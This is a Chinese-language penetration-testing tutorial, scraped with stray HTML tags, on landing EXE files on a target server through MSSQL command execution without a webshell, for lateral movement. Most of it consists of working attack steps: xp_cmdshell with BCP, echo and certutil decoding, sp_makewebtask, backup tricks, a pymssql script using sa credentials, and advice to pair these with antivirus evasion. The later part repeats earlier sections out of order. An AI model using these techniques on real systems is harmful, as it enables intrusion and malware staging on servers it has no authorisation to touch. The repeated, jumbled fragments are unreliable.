MSSQL站库分离环境下无Webshell落地EXE文件方法研究<\/h1>

1. 前言<\/h2>
在站库分离且数据库不出网的环境中，当仅拥有MSSQL命令执行权限而无Webshell时，横向移动需要将工具通过数据库落地到目标服务器。本文详细研究多种在MSSQL环境下落地EXE文件的技术方法。<\/p>

2. 环境准备<\/h2>

操作系统：Windows 10 x64<\/li>
数据库版本：MSSQL 2019<\/li>

权限要求：MSSQL执行命令权限<\/li> <\/ul>

3. BCP方法<\/h2>

3.1 方法简介<\/h3>
BCP(Bulk Copy Program)是MSSQL提供的大容量复制工具，可用于导入导出数据。<\/p>

3.2 适用版本<\/h3>
全版本MSSQL支持<\/p>

3.3 操作步骤<\/h3>

创建存储二进制数据的表：<\/li> <\/ol>

create<\/span> table<\/span> info(data<\/span> image)
<\/span><\/span><\/code><\/pre>
插入EXE文件的16进制数据（注意添加0x前缀）：<\/li>
<\/ol>
insert<\/span> into<\/span> info(data<\/span>) values<\/span> (0<\/span>x4D5A900003000000...)
<\/span><\/span><\/code><\/pre>
使用BCP导出数据：<\/li>
<\/ol>
exec<\/span> master..xp_cmdshell 'bcp test.dbo.info out c:\users\public\12.txt -T -c'<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-T<\/code>：可信任连接<\/li>
-c<\/code>：字符类型<\/li>
<\/ul>

解码16进制文件为EXE：<\/li>
<\/ol>
exec<\/span> master..xp_cmdshell 'certutil -decodehex c:\users\public\12.txt c:\users\public\12.exe'<\/span>
<\/span><\/span><\/code><\/pre>或使用Python解码：<\/p>
python -<\/span>c "import binascii;text=open('res.exe','ab');text.write(binascii.a2b_hex(open('exe-hex.txt').read()))"<\/span>
<\/span><\/span><\/code><\/pre>4. sp_makewebtask方法<\/h2>
4.1 方法简介<\/h3>
通过Web Assistant Procedures扩展导出文档。<\/p>
4.2 适用版本<\/h3>
仅限MSSQL 2008及以下版本<\/p>
4.3 操作步骤<\/h3>

开启Web Assistant Procedures扩展：<\/li>
<\/ol>
exec<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>exec<\/span> sp_configure 'Web Assistant Procedures'<\/span>,1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span><\/code><\/pre>
导出16进制数据：<\/li>
<\/ol>
exec<\/span> sp_makewebtask '\\路径\\hex.txt'<\/span>,'select''exe_hex'' '<\/span>
<\/span><\/span><\/code><\/pre>
解码为EXE文件：<\/li>
<\/ol>
exec<\/span> master..xp_cmdshell 'certutil -decodehex \\路径\\hex.txt \\路径\\test.exe'<\/span>
<\/span><\/span><\/code><\/pre>
关闭扩展（可选）：<\/li>
<\/ol>
exec<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span>exec<\/span> sp_configure 'Web Assistant Procedures'<\/span>,0<\/span>;
<\/span><\/span>RECONFIGURE;
<\/span><\/span><\/code><\/pre>5. Echo方法<\/h2>
5.1 方法简介<\/h3>
使用Windows的echo命令导出16进制数据。<\/p>
5.2 操作步骤<\/h3>

使用set \/p实现不换行追加：<\/li>
<\/ol>
exec<\/span> master..xp_cmdshell 'echo|set \/p="4D5A900003" > c:\users\public\12.txt'<\/span>
<\/span><\/span><\/code><\/pre>

分段追加数据（Windows单次最多导出约8KB数据）<\/p>
<\/li>

解码为EXE文件：<\/p>
<\/li>
<\/ol>
exec<\/span> master..xp_cmdshell 'certutil -decodehex c:\users\public\12.txt c:\users\public\12.exe'<\/span>
<\/span><\/span><\/code><\/pre>6. Python方法<\/h2>
6.1 方法简介<\/h3>
使用Python连接MSSQL并导出二进制数据。<\/p>
6.2 前提条件<\/h3>

目标系统安装Python<\/li>
知道MSSQL账号密码<\/li>
Python环境支持pymssql库<\/li>
<\/ul>
6.3 操作代码<\/h3>
import<\/span> pymssql
<\/span><\/span>conn =<\/span> pymssql.<\/span>connect(
<\/span><\/span>    host=<\/span>'192.168.112.149'<\/span>,
<\/span><\/span>    user=<\/span>'sa'<\/span>,
<\/span><\/span>    password=<\/span>'123456'<\/span>,
<\/span><\/span>    database=<\/span>'test'<\/span>,
<\/span><\/span>    charset=<\/span>'utf8'<\/span>
<\/span><\/span>)
<\/span><\/span>cur =<\/span> conn.<\/span>cursor()
<\/span><\/span>sqlstr =<\/span> 'select data from info'<\/span>
<\/span><\/span>cur.<\/span>execute(sqlstr)
<\/span><\/span>data =<\/span> cur.<\/span>fetchall()[0<\/span>][0<\/span>].<\/span>strip()
<\/span><\/span>open('tesz.exe'<\/span>,'ab'<\/span>).<\/span>write(data)
<\/span><\/span>cur.<\/span>close()
<\/span><\/span>conn.<\/span>close()
<\/span><\/span><\/code><\/pre>7. 备份方法（实验性）<\/h2>
7.1 日志备份<\/h3>

设置数据库为完全恢复模式：<\/li>
<\/ol>
alter<\/span> database<\/span> 数据库名称<\/span> set<\/span> RECOVERY FULL<\/span>
<\/span><\/span><\/code><\/pre>
创建二进制数据表：<\/li>
<\/ol>
create<\/span> table<\/span> info (data<\/span> image)
<\/span><\/span><\/code><\/pre>
备份数据库：<\/li>
<\/ol>
backup database<\/span> 数据库名称<\/span> to<\/span> disk =<\/span> '\\path\\'<\/span> with<\/span> init
<\/span><\/span><\/code><\/pre>
插入16进制数据：<\/li>
<\/ol>
insert<\/span> into<\/span> cmd (a) values<\/span> (0<\/span>x执行文件的<\/span>16<\/span>进制<\/span>)
<\/span><\/span><\/code><\/pre>
备份日志：<\/li>
<\/ol>
backup log 数据库名称<\/span> to<\/span> disk =<\/span> 'path'<\/span>
<\/span><\/span><\/code><\/pre>注意：此方法导出的16进制数据会被隔断，目前无法直接使用。<\/p>
7.2 差异备份<\/h3>

完整备份数据库：<\/li>
<\/ol>
backup database<\/span> test to<\/span> disk =<\/span> 'C:\Users\Public\bak.log'<\/span> with<\/span> init
<\/span><\/span><\/code><\/pre>
创建数据表并插入16进制：<\/li>
<\/ol>
create<\/span> table<\/span> test.dbo.info (data<\/span> image);
<\/span><\/span>insert<\/span> into<\/span> info (data<\/span>) values<\/span> ('可执行文件的16进制'<\/span>)
<\/span><\/span><\/code><\/pre>
差异备份：<\/li>
<\/ol>
backup database<\/span> test to<\/span> disk =<\/span> 'C:\Users\Public\test2.log'<\/span> with<\/span> differential,format
<\/span><\/span><\/code><\/pre>注意：同样存在数据被隔断的问题。<\/p>
8. 方法总结<\/h2>



方法<\/th>
适用版本<\/th>
优点<\/th>
缺点<\/th>
<\/tr>
<\/thead>


BCP<\/td>
全版本<\/td>
支持性好，操作简单<\/td>
需要xp_cmdshell权限<\/td>
<\/tr>

sp_makewebtask<\/td>
≤2008<\/td>
无需BCP<\/td>
仅限旧版本<\/td>
<\/tr>

Echo<\/td>
全版本<\/td>
无需额外工具<\/td>
操作繁琐，单次限制8KB<\/td>
<\/tr>

Python<\/td>
全版本<\/td>
灵活可控<\/td>
需要Python环境<\/td>
<\/tr>

备份方法<\/td>
全版本<\/td>
理论可行<\/td>
实际数据被隔断<\/td>
<\/tr>
<\/tbody>
<\/table>
9. 优化思考<\/h2>

对于Echo方法，可在解码前使用编程语言处理换行符<\/li>
日志备份方法可尝试用编程语言解决数据隔断问题<\/li>
实际应用中需结合免杀技术绕过AV检测<\/li>
<\/ol>
10. 参考资源<\/h2>

MSSQL存储过程文档<\/a><\/li>
Python连接MSSQL<\/a><\/li>
MSSQL数据库恢复模式<\/a><\/li>
<\/ol>

方法<\/th>	适用版本<\/th>	优点<\/th>	缺点<\/th> <\/tr> <\/thead>
BCP<\/td>	全版本<\/td>	支持性好，操作简单<\/td>	需要xp_cmdshell权限<\/td> <\/tr>
sp_makewebtask<\/td>	≤2008<\/td>	无需BCP<\/td>	仅限旧版本<\/td> <\/tr>
Echo<\/td>	全版本<\/td>	无需额外工具<\/td>	操作繁琐，单次限制8KB<\/td> <\/tr>
Python<\/td>	全版本<\/td>	灵活可控<\/td>	需要Python环境<\/td> <\/tr>
备份方法<\/td>	全版本<\/td>	理论可行<\/td>	实际数据被隔断<\/td> <\/tr> <\/tbody> <\/table> 9. 优化思考<\/h2> 对于Echo方法，可在解码前使用编程语言处理换行符<\/li> 日志备份方法可尝试用编程语言解决数据隔断问题<\/li> 实际应用中需结合免杀技术绕过AV检测<\/li> <\/ol> 10. 参考资源<\/h2> MSSQL存储过程文档<\/a><\/li> Python连接MSSQL<\/a><\/li> MSSQL数据库恢复模式<\/a><\/li> <\/ol>

MSSQL站库分离环境下无Webshell落地EXE文件方法研究<\/h1>

1. 前言<\/h2> 在站库分离且数据库不出网的环境中，当仅拥有MSSQL命令执行权限而无Webshell时，横向移动需要将工具通过数据库落地到目标服务器。本文详细研究多种在MSSQL环境下落地EXE文件的技术方法。<\/p>

3. BCP方法<\/h2>

3.1 方法简介<\/h3> BCP(Bulk Copy Program)是MSSQL提供的大容量复制工具，可用于导入导出数据。<\/p>

3.2 适用版本<\/h3> 全版本MSSQL支持<\/p>

4. sp_makewebtask方法<\/h2>

4.1 方法简介<\/h3> 通过Web Assistant Procedures扩展导出文档。<\/p>

4.2 适用版本<\/h3> 仅限MSSQL 2008及以下版本<\/p>

5. Echo方法<\/h2>

5.1 方法简介<\/h3> 使用Windows的echo命令导出16进制数据。<\/p>

6. Python方法<\/h2>

6.1 方法简介<\/h3> 使用Python连接MSSQL并导出二进制数据。<\/p>

7. 备份方法（实验性）<\/h2>

10. 参考资源<\/h2> MSSQL存储过程文档<\/a><\/li> Python连接MSSQL<\/a><\/li> MSSQL数据库恢复模式<\/a><\/li> <\/ol>

1. 前言<\/h2>
在站库分离且数据库不出网的环境中，当仅拥有MSSQL命令执行权限而无Webshell时，横向移动需要将工具通过数据库落地到目标服务器。本文详细研究多种在MSSQL环境下落地EXE文件的技术方法。<\/p>

3.1 方法简介<\/h3>
BCP(Bulk Copy Program)是MSSQL提供的大容量复制工具，可用于导入导出数据。<\/p>

3.2 适用版本<\/h3>
全版本MSSQL支持<\/p>

4.1 方法简介<\/h3>
通过Web Assistant Procedures扩展导出文档。<\/p>

4.2 适用版本<\/h3>
仅限MSSQL 2008及以下版本<\/p>

5.1 方法简介<\/h3>
使用Windows的echo命令导出16进制数据。<\/p>

6.1 方法简介<\/h3>
使用Python连接MSSQL并导出二进制数据。<\/p>

10. 参考资源<\/h2>

MSSQL存储过程文档<\/a><\/li>
Python连接MSSQL<\/a><\/li>
MSSQL数据库恢复模式<\/a><\/li> <\/ol>